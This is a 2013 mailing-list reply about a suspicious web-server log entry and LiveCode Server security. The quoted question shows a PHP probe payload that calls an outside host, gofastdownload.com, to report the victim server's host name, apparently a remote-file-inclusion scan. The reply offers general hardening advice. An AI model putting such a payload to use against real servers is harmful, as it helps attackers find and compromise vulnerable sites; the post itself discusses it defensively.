[OT] server log entry?
ambassador at fourthworld.com
Fri May 24 11:51:12 CDT 2013
Thierry Douez wrote:
> Here is the line:
> 220.127.116.11 ... "GET
> gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
> The file ../rf/s.txt contains:
> <?php file_get_contents('
> http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0);
> The IP point in the middle of nowhere in Russia.
> and finally I know nothing about php.
> If someone has some more precise answer, I"m still interested :)
I don't have anything more specific on that, but I find it interesting
that it appears to have been successful (result code 200).
On most Apache and auth logs you'll find a great many attempts at all
sorts of exploits, and most fail simply because the file they're looking
for isn't there, or has been adequately protected against such attacks.
As a general rule I try to stay current with all server components
(MySQL, PHP, any frameworks like Wordpress, Drupal, etc.), and most of
the time staying current blocks malicious bots.
That said, security is an ongoing process of cat and mouse, and no
matter how frequently system components are updated there's always some
new exploit being devised and deployed.
I don't know enough about Python or your system setup to suggest how to
prevent that specific attack, but in general if you move your CGI
engines outside of the public HTML folder, lock down permissions as
tightly as practical, and religiously sanitize inputs you can greatly
minimize such risks.
One more thing in favor of LiveCode Server: until LC really takes off
we get a minor benefit from "security by obscurity" - that is, it simply
isn't worth most attackers' time to target LC because it's seldom used
on the Web.
Moreover, the LC engine has historically been immune to buffer overruns,
so a wide range of potential exploits that have affected other
components are very unlikely to affect LC.
And being a very readable language, it's often easier to maintain good
sanitization practices with LC.
LiveCode training and consulting: http://www.fourthworld.com
Webzine for LiveCode developers: http://www.LiveCodeJournal.com
Follow me on Twitter: http://twitter.com/FourthWorldSys
More information about the use-livecode